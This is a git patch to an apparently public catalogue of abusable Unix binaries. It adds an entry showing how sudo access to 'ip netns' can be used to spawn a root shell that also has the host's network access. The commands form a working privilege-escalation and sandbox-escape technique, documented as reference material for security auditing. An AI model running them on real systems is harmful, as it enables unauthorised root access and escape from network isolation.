From 88e43c42a9b5753b520b7a393fb35053aaa587b9 Mon Sep 17 00:00:00 2001
From: Chris M <21688716+explodeo@users.noreply.github.com>
Date: Sat, 11 Feb 2023 13:11:00 -0500
Subject: [PATCH] Update ip.md with to break out of restricted network
 namespace

Add command to allow access to interfaces in restricted namespace without affecting host networking

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/ip.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/_gtfobins/ip.md b/_gtfobins/ip.md
index 02a690a..8e8b81e 100644
--- a/_gtfobins/ip.md
+++ b/_gtfobins/ip.md
@@ -24,4 +24,12 @@ functions:
         sudo ip netns add foo
         sudo ip netns exec foo /bin/sh
         sudo ip netns delete foo
+    - description: This only works for Linux with CONFIG_NET_NS=y. This version also grants network access.
+      code: |
+        sudo ip netns add foo
+        sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
+        sudo ip netns exec bar /bin/sh
+        sudo ip netns delete foo
+        sudo ip netns delete bar
+
 ---